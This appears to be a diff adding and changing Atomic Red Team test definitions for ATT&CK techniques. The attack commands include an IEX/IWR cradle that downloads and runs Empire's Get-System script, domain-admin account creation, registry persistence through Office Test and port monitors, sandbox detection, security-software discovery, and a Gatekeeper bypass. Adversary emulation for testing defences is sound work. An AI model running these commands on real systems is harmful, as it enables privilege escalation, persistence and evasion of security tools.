+      description: Time to take screenshots
+      type: String
+      default: 5
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
+      Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
+      [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
+      cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
+    cleanup_command: |
+      rm #{output_file}

atomics/T1134.001/T1134.001.md

@@ -0,0 +1,65 @@
+# T1134.001 - Token Impersonation/Theft
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1134/001)
+<blockquote>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread.
+
+An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Named pipe client impersonation](#atomic-test-1---named-pipe-client-impersonation)
+
+- [Atomic Test #2 - `SeDebugPrivilege` token duplication](#atomic-test-2---sedebugprivilege-token-duplication)
+
+
+<br/>
+
+## Atomic Test #1 - Named pipe client impersonation
+Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
+When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+
+Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique NamedPipe -Verbose
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - `SeDebugPrivilege` token duplication
+Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
+When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique Token -Verbose
+```
+
+
+
+
+
+
+<br/>

atomics/T1134.001/T1134.001.yaml

@@ -0,0 +1,27 @@
+attack_technique: T1134.001
+display_name: 'Access Token Manipulation: Token Impersonation/Theft'
+atomic_tests:
+- name: Named pipe client impersonation
+  auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
+  description: |-
+    Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
+    When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+
+    Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
+  supported_platforms:
+  - windows
+  executor:
+    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique NamedPipe -Verbose
+    name: powershell
+    elevation_required: true
+- name: '`SeDebugPrivilege` token duplication'
+  auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
+  description: |-
+    Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
+    When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
+  supported_platforms:
+  - windows
+  executor:
+    command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'); Get-System -Technique Token -Verbose
+    name: powershell
+    elevation_required: true

atomics/T1136.002/T1136.002.md

@@ -0,0 +1,83 @@
+# T1136.002 - Domain Account
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/002)
+<blockquote>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.
+
+Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Create a new Windows domain admin user](#atomic-test-1---create-a-new-windows-domain-admin-user)
+
+- [Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON](#atomic-test-2---create-a-new-account-similar-to-anonymous-logon)
+
+
+<br/>
+
+## Atomic Test #1 - Create a new Windows domain admin user
+Creates a new domain admin user in a command prompt.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| username | Username of the user to create | String | T1136.002_Admin|
+| password | Password of the user to create | String | T1136_pass123!|
+| group | Domain administrator group to which add the user to | String | Domain Admins|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+net user "#{username}" "#{password}" /add /domain
+net group "#{group}" "#{username}" /add /domain
+```
+
+#### Cleanup Commands:
+```cmd
+net user "#{username}" >nul 2>&1 /del /domain
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON
+Create a new account similar to ANONYMOUS LOGON in a command prompt.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| username | Username of the user to create | String | ANONYMOUS  LOGON|
+| password | Password of the user to create | String | T1136_pass123!|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+net user "#{username}" "#{password}" /add /domain
+```
+
+#### Cleanup Commands:
+```cmd
+net user "#{username}" >nul 2>&1 /del /domain
+```
+
+
+
+
+
+<br/>

atomics/T1136.002/T1136.002.yaml

@@ -0,0 +1,52 @@
+attack_technique: T1136.002
+display_name: 'Create Account: Domain Account'
+atomic_tests:
+- name: Create a new Windows domain admin user
+  auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
+  description: |
+    Creates a new domain admin user in a command prompt.
+  supported_platforms:
+  - windows
+  input_arguments:
+    username:
+      description: Username of the user to create
+      type: String
+      default: T1136.002_Admin
+    password:
+      description: Password of the user to create
+      type: String
+      default: T1136_pass123!
+    group:
+      description: Domain administrator group to which add the user to
+      type: String
+      default: Domain Admins
+  executor:
+    command: |
+      net user "#{username}" "#{password}" /add /domain
+      net group "#{group}" "#{username}" /add /domain
+    cleanup_command: |
+      net user "#{username}" >nul 2>&1 /del /domain
+    name: command_prompt
+    elevation_required: false  # Requires a user to be a Domain Admin!
+- name: Create a new account similar to ANONYMOUS LOGON
+  auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
+  description: |
+    Create a new account similar to ANONYMOUS LOGON in a command prompt.
+  supported_platforms:
+  - windows
+  input_arguments:
+    username:
+      description: Username of the user to create
+      type: String
+      default: ANONYMOUS  LOGON
+    password:
+      description: Password of the user to create
+      type: String
+      default: T1136_pass123!
+  executor:
+    command: |
+      net user "#{username}" "#{password}" /add /domain
+    cleanup_command: |
+      net user "#{username}" >nul 2>&1 /del /domain
+    name: command_prompt
+    elevation_required: false  # Requires a user to be a Domain Admin!

atomics/T1137.002/T1137.002.md

@@ -0,0 +1,50 @@
+# T1137.002 - Office Test
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/002)
+<blockquote>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
+
+There exist user and global Registry keys for the Office Test feature:
+
+* <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>
+* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>
+
+Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Office Apllication Startup Test Persistence](#atomic-test-1---office-apllication-startup-test-persistence)
+
+
+<br/>
+
+## Atomic Test #1 - Office Apllication Startup Test Persistence
+Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office
+application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| thing_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}"
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
+```
+
+
+
+
+
+<br/>

atomics/T1137.002/T1137.002.yaml

@@ -0,0 +1,21 @@
+attack_technique: T1137.002
+display_name: 'Office Application Startup: Office Test'
+atomic_tests:
+- name: Office Apllication Startup Test Persistence
+  auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563
+  description: |
+    Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office
+    application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives.
+  supported_platforms:
+  - windows
+  input_arguments:
+    thing_to_execute:
+      description: Thing to Run
+      type: Path
+      default: C:\Path\AtomicRedTeam.dll
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}"
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
+    name: command_prompt

atomics/T1202/T1202.md

@@ -10,6 +10,8 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
 
 - [Atomic Test #2 - Indirect Command Execution - forfiles.exe](#atomic-test-2---indirect-command-execution---forfilesexe)
 
+- [Atomic Test #3 - Indirect Command Execution - conhost.exe](#atomic-test-3---indirect-command-execution---conhostexe)
+
 
 <br/>
 
@@ -76,4 +78,35 @@ forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Indirect Command Execution - conhost.exe
+conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer.
+Executing it through command line can create process ancestry anomalies
+[Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| process | Process to execute | string | notepad.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+conhost.exe "#{process}"
+```
+
+
+
+
+
+
 <br/>

atomics/T1202/T1202.yaml

@@ -42,4 +42,21 @@ atomic_tests:
       forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
       forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
     name: command_prompt
+- name: Indirect Command Execution - conhost.exe
+  auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29
+  description: |
+    conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer.
+    Executing it through command line can create process ancestry anomalies
+    [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    process:
+      description: Process to execute
+      type: string
+      default: notepad.exe
+  executor:
+    command: |
+      conhost.exe "#{process}"
+    name: command_prompt
 

atomics/T1497.001/T1497.001.md

@@ -0,0 +1,100 @@
+# T1497.001 - System Checks
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1497/001)
+<blockquote>Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. 
+
+Specific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. 
+
+Checks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. 
+
+Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
+ 
+Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Detect Virtualization Environment (Linux)](#atomic-test-1---detect-virtualization-environment-linux)
+
+- [Atomic Test #2 - Detect Virtualization Environment (Windows)](#atomic-test-2---detect-virtualization-environment-windows)
+
+- [Atomic Test #3 - Detect Virtualization Environment (MacOS)](#atomic-test-3---detect-virtualization-environment-macos)
+
+
+<br/>
+
+## Atomic Test #1 - Detect Virtualization Environment (Linux)
+systemd-detect-virt detects execution in a virtualized environment.
+At boot, dmesg stores a log if a hypervisor is detected.
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Detect Virtualization Environment (Windows)
+Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$error.clear()
+Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
+if($error) {echo "Virtualization Environment detected"}
+```
+
+#### Cleanup Commands:
+```powershell
+$error.clear()
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Detect Virtualization Environment (MacOS)
+ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.
+
+**Supported Platforms:** macOS
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
+```
+
+
+
+
+
+
+<br/>

atomics/T1497.001/T1497.001.yaml

@@ -0,0 +1,42 @@
+---
+attack_technique: T1497.001
+display_name: 'Virtualization/Sandbox Evasion: System Checks'
+atomic_tests:
+- name: Detect Virtualization Environment (Linux)
+  auto_generated_guid: dfbd1a21-540d-4574-9731-e852bd6fe840
+  description: |
+    systemd-detect-virt detects execution in a virtualized environment.
+    At boot, dmesg stores a log if a hypervisor is detected.
+  supported_platforms:
+    - linux
+  executor:
+    name: sh
+    elevation_required: true 
+    command: | 
+      if (systemd-detect-virt || sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
+- name: Detect Virtualization Environment (Windows)
+  auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
+  description: |
+    Windows Management Instrumentation(WMI) objects contains system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check to see if the attempt results in an error that contains the word supported. This is meant to find the result of Not supported, which is the result if run in a virtual machine
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false 
+    command: | 
+      $error.clear()
+      Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
+      if($error) {echo "Virtualization Environment detected"}
+    cleanup_command: |
+      $error.clear()
+- name: Detect Virtualization Environment (MacOS)
+  auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
+  description: |
+    ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturer will be a Virtualization Software.
+  supported_platforms:
+    - macos
+  executor:
+    name: sh
+    elevation_required: false 
+    command: | 
+      if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;

atomics/T1518.001/T1518.001.md

@@ -12,11 +12,13 @@ Adversaries may also utilize cloud APIs to discover the configurations of firewa
 
 - [Atomic Test #2 - Security Software Discovery - powershell](#atomic-test-2---security-software-discovery---powershell)
 
-- [Atomic Test #3 - Security Software Discovery - ps](#atomic-test-3---security-software-discovery---ps)
+- [Atomic Test #3 - Security Software Discovery - ps (macOS)](#atomic-test-3---security-software-discovery---ps-macos)
 
-- [Atomic Test #4 - Security Software Discovery - Sysmon Service](#atomic-test-4---security-software-discovery---sysmon-service)
+- [Atomic Test #4 - Security Software Discovery - ps (Linux)](#atomic-test-4---security-software-discovery---ps-linux)
 
-- [Atomic Test #5 - Security Software Discovery - AV Discovery via WMI](#atomic-test-5---security-software-discovery---av-discovery-via-wmi)
+- [Atomic Test #5 - Security Software Discovery - Sysmon Service](#atomic-test-5---security-software-discovery---sysmon-service)
+
+- [Atomic Test #6 - Security Software Discovery - AV Discovery via WMI](#atomic-test-6---security-software-discovery---av-discovery-via-wmi)
 
 
 <br/>
@@ -82,11 +84,11 @@ get-process | ?{$_.Description -like "*cylance*"}
 <br/>
 <br/>
 
-## Atomic Test #3 - Security Software Discovery - ps
+## Atomic Test #3 - Security Software Discovery - ps (macOS)
 Methods to identify Security Software on an endpoint
-when sucessfully executed, command shell  is going to display AV software it is running( Little snitch or carbon black ).
+when sucessfully executed, command shell  is going to display AV/Security software it is running.
 
-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** macOS
 
 
 
@@ -96,9 +98,7 @@ when sucessfully executed, command shell  is going to display AV software it is
 
 
 ```sh
-ps -ef | grep Little\ Snitch | grep -v grep
-ps aux | grep CbOsxSensorService
-ps aux | grep falcond
+ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
 ```
 
 
@@ -109,7 +109,32 @@ ps aux | grep falcond
 <br/>
 <br/>
 
-## Atomic Test #4 - Security Software Discovery - Sysmon Service
+## Atomic Test #4 - Security Software Discovery - ps (Linux)
+Methods to identify Security Software on an endpoint
+when sucessfully executed, command shell  is going to display AV/Security software it is running.
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Security Software Discovery - Sysmon Service
 Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
 
 when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
@@ -135,7 +160,7 @@ fltmc.exe | findstr.exe 385201
 <br/>
 <br/>
 
-## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI
+## Atomic Test #6 - Security Software Discovery - AV Discovery via WMI
 Discovery of installed antivirus products via a WMI query.
 
 when sucessfully executed, the test is going to display installed AV software.

atomics/T1518.001/T1518.001.yaml

@@ -34,19 +34,27 @@ atomic_tests:
       get-process | ?{$_.Description -like "*defender*"}
       get-process | ?{$_.Description -like "*cylance*"}
     name: powershell
-- name: Security Software Discovery - ps
+- name: Security Software Discovery - ps (macOS)
   auto_generated_guid: ba62ce11-e820-485f-9c17-6f3c857cd840
   description: |
     Methods to identify Security Software on an endpoint
-    when sucessfully executed, command shell  is going to display AV software it is running( Little snitch or carbon black ).
+    when sucessfully executed, command shell  is going to display AV/Security software it is running.
   supported_platforms:
-  - linux
   - macos
   executor:
     command: |
-      ps -ef | grep Little\ Snitch | grep -v grep
-      ps aux | grep CbOsxSensorService
-      ps aux | grep falcond
+      ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
+    name: sh
+- name: Security Software Discovery - ps (Linux)
+  auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
+  description: |
+    Methods to identify Security Software on an endpoint
+    when sucessfully executed, command shell  is going to display AV/Security software it is running.
+  supported_platforms:
+  - linux
+  executor:
+    command: |
+      ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
     name: sh
 - name: Security Software Discovery - Sysmon Service
   auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9

atomics/T1547.010/T1547.010.md

@@ -0,0 +1,51 @@
+# T1547.010 - Port Monitors
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/010)
+<blockquote>Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>. 
+
+The Registry key contains entries for the following:
+
+* Local Port
+* Standard TCP/IP Port
+* USB Monitor
+* WSD Port
+
+Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Add Port Monitor persistence in Registry](#atomic-test-1---add-port-monitor-persistence-in-registry)
+
+
+<br/>
+
+## Atomic Test #1 - Add Port Monitor persistence in Registry
+Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| monitor_dll | Addition to port monitor registry key. Normally refers to a DLL name in C:&#92;Windows&#92;System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. | Path | C:&#92;Path&#92;AtomicRedTeam.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
+```
+
+
+
+
+
+<br/>

atomics/T1547.010/T1547.010.yaml

@@ -0,0 +1,20 @@
+attack_technique: T1547.010
+display_name: 'Boot or Logon Autostart Execution: Port Monitors'
+atomic_tests:
+- name: Add Port Monitor persistence in Registry
+  auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50
+  description: Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    monitor_dll:
+      description: Addition to port monitor registry key. Normally refers to a DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL.
+      type: Path
+      default: C:\Path\AtomicRedTeam.dll
+  executor:
+    command: |
+      reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
+    cleanup_command: |
+      reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
+    name: command_prompt
+    elevation_required: true

atomics/T1553.001/T1553.001.md

@@ -31,8 +31,7 @@ Gatekeeper Bypass via command line
 
 
 ```sh
-sudo xattr -r -d com.apple.quarantine #{app_path}
-sudo spctl --master-disable
+sudo xattr -d com.apple.quarantine #{app_path}
 ```
 
 

atomics/T1553.001/T1553.001.yaml

@@ -14,7 +14,6 @@ atomic_tests:
       default: myapp.app
   executor:
     command: |
-      sudo xattr -r -d com.apple.quarantine #{app_path}
-      sudo spctl --master-disable
+      sudo xattr -d com.apple.quarantine #{app_path}
     elevation_required: true
     name: sh

atomics/T1562.001/T1562.001.md

@@ -18,37 +18,39 @@
 
 - [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella)
 
-- [Atomic Test #8 - Stop and unload Crowdstrike Falcon on macOS](#atomic-test-8---stop-and-unload-crowdstrike-falcon-on-macos)
+- [Atomic Test #8 - Disable macOS Gatekeeper](#atomic-test-8---disable-macos-gatekeeper)
 
-- [Atomic Test #9 - Unload Sysmon Filter Driver](#atomic-test-9---unload-sysmon-filter-driver)
+- [Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS](#atomic-test-9---stop-and-unload-crowdstrike-falcon-on-macos)
 
-- [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)
+- [Atomic Test #10 - Unload Sysmon Filter Driver](#atomic-test-10---unload-sysmon-filter-driver)
 
-- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
+- [Atomic Test #11 - Uninstall Sysmon](#atomic-test-11---uninstall-sysmon)
 
-- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)
+- [Atomic Test #12 - AMSI Bypass - AMSI InitFailed](#atomic-test-12---amsi-bypass---amsi-initfailed)
 
-- [Atomic Test #13 - Disable Arbitrary Security Windows Service](#atomic-test-13---disable-arbitrary-security-windows-service)
+- [Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-13---amsi-bypass---remove-amsi-provider-reg-key)
 
-- [Atomic Test #14 - Tamper with Windows Defender ATP PowerShell](#atomic-test-14---tamper-with-windows-defender-atp-powershell)
+- [Atomic Test #14 - Disable Arbitrary Security Windows Service](#atomic-test-14---disable-arbitrary-security-windows-service)
 
-- [Atomic Test #15 - Tamper with Windows Defender Command Prompt](#atomic-test-15---tamper-with-windows-defender-command-prompt)
+- [Atomic Test #15 - Tamper with Windows Defender ATP PowerShell](#atomic-test-15---tamper-with-windows-defender-atp-powershell)
 
-- [Atomic Test #16 - Tamper with Windows Defender Registry](#atomic-test-16---tamper-with-windows-defender-registry)
+- [Atomic Test #16 - Tamper with Windows Defender Command Prompt](#atomic-test-16---tamper-with-windows-defender-command-prompt)
 
-- [Atomic Test #17 - Disable Microsoft Office Security Features](#atomic-test-17---disable-microsoft-office-security-features)
+- [Atomic Test #17 - Tamper with Windows Defender Registry](#atomic-test-17---tamper-with-windows-defender-registry)
 
-- [Atomic Test #18 - Remove Windows Defender Definition Files](#atomic-test-18---remove-windows-defender-definition-files)
+- [Atomic Test #18 - Disable Microsoft Office Security Features](#atomic-test-18---disable-microsoft-office-security-features)
 
-- [Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-19---stop-and-remove-arbitrary-security-windows-service)
+- [Atomic Test #19 - Remove Windows Defender Definition Files](#atomic-test-19---remove-windows-defender-definition-files)
 
-- [Atomic Test #20 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-20---uninstall-crowdstrike-falcon-on-windows)
+- [Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service](#atomic-test-20---stop-and-remove-arbitrary-security-windows-service)
 
-- [Atomic Test #21 - Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-21---tamper-with-windows-defender-evade-scanning--folder)
+- [Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows](#atomic-test-21---uninstall-crowdstrike-falcon-on-windows)
 
